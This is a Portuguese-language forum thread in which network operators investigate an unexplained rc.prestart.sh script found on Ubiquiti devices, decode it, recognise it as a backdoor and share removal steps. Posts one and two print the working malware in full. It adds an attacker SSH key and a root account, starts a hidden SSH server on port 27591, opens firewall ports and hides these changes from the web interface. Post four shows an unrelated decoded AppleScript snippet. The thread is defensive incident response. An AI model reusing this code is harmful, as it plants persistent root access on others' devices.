+ Responder ao Tópico



  1. #1

    Padrão Sript estranho encontrado em alguns equipamentos

    Olá pessoal, sou novo no fórum e esse é meu primeiro tópico.
    Estou atualizando vários equipamentos Ubiquiti para a versão 5.6.4, percebi que desde sábado tenho encontrado equipamentos que não aceitam atualização do firmware, eles dão erro de arquivo corrompido e não aceitam atualizar, porém se eu clico na notificação de nova versão que aparece no canto inferior direito ele aceita atualizar. Depois de atualizado para 5.6.4 o sistema desses equipamentos exibe um script que foi instalado no equipamento, só nós não instalamos script nenhum, eu baixei e não tenho ideia do que isso faz nesses aparelhos, o nome do arquivo é "rc.prestart.sh", segue abaixo as linhas dele:

    #!/bin/sh
    mkdir -p /var/bin
    cat << EOFEOFEOF | uudecode -o /var/bin/cgi -
    begin-base64 755 -
    IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl
    bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz
    YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t
    ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM
    ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1
    R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH
    QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z
    a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w
    Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv
    cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp
    clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0
    Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r
    ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl
    bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt
    YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k
    ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg
    LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF
    UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv
    cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn
    c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp
    Jwo=
    ====
    EOFEOFEOF
    chmod 755 /var/bin/cgi 2>/dev/null
    sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf
    sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf


    Eu já achei oito aparelhos com isso e todos eles se recusavam a atualizar o firmware que eu baixei do site oficial da Uibiquiti, todos os equipamentos estavam com a versão 5.5.10 antes de atualizar. Alguém tem ideia do que é isso? Obrigado.

  2. #2

    Padrão

    Bem suspeito mesmo, veja o conteúdo que estava criptografado!

    Código :
    #!/bin/shif [ "$HTTP_HOST" = "localhost.localnet" ]; then
        PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys
        echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd
     
     
        if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then
            dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1
        fi
     
     
        dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
        iptables -I INPUT -p tcp --dport 22 -j ACCEPT
        iptables -I INPUT -p tcp --dport 27591 -j ACCEPT
    fi
     
     
    grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)'

  3. #3

    Padrão Re: Sript estranho encontrado em alguns equipamentos

    Obrigado radar02123, isso aí é algum dropper, trojan, worm ou coisa assim? Nós já tivemos problemas com o Skynet no passado e precisamos limpar cada um dos nossos equipamentos, parece que vai ser o caso novamente, se for mesmo alguma nova praga falta saber o nome dela.

  4. #4

    Padrão Re: Sript estranho encontrado em alguns equipamentos

    Decriptografando da esse trecho...
    set theButtonNames to {"Set Used Prefs (all *'ed items)", "Set SWUpdateServer*", "List SWUpdateServer", "Remove SWUpdateServer", "Set MacHQ homepage*", "Disable Sleep*", "Rename HD by Size*", "Install MHQ Reset Script", "Remove Current User & Reset CPU", "Test for Flashback Trojan", "Test for ShellShock vulnerability", "Rebuild Launch Services DB", "Flush DNS Cache", "Reset Fake preferences", "Update Fake Workflows from Server", "Install SWUpdate StartupItem", "Save System Profiler Report to server"}

  5. #5

    Padrão Re: Sript estranho encontrado em alguns equipamentos

    Citação Postado originalmente por ab5x2 Ver Post
    E, já tentou reinstalar o firmware por TFTP?
    Não tentei ainda porque estes equipamentos eu acesso remotamente, também disseram para eu fazer isso no chat da Ubiquiti ontem a noite. Eu consigo atualizar o firmware pela guia "System" na página de configuração do equipamento, depois de atualizado para a versão 5.6.4 esse script fica visível na guia "Main", é só excluir e salvar que ele some.
    A minha preocupação é saber o que isso faz nos equipamentos e se eu vou ter que limpar de novo todos esses equipamentos igual na vez do antigo Skynet.

  6. #6

    Padrão Re: Sript estranho encontrado em alguns equipamentos

    Pelo que entendi ele é um backdoor!

    http://blog.sec-consult.com/2015/11/...-networks.html
    Última edição por radar02123; 03-05-2016 às 09:46.

  7. #7

    Padrão Re: Sript estranho encontrado em alguns equipamentos

    Novidades! Acabei de fazer um teste aqui e é possível remover esse backdoor sem precisar de recovery, basta se logar no equipamento via ssh e usar a linha de comando abaixo:

    rm -rf /etc/persistent/rc.prestart; cfgmtd -w -p /etc; reboot;

    Após reiniciar o aparelho o script some e é só atualizar para 5.6.4 que está livre dessa praga.

  8. #8

    Padrão Re: Sript estranho encontrado em alguns equipamentos

    Aconselho você fazer uma varredura na sua rede, afim de procurar dispositivos que esteja com a porta ssh e 27591 abertas. Além de executar as ações necessárias para aumentar a segurança desses dispositivos.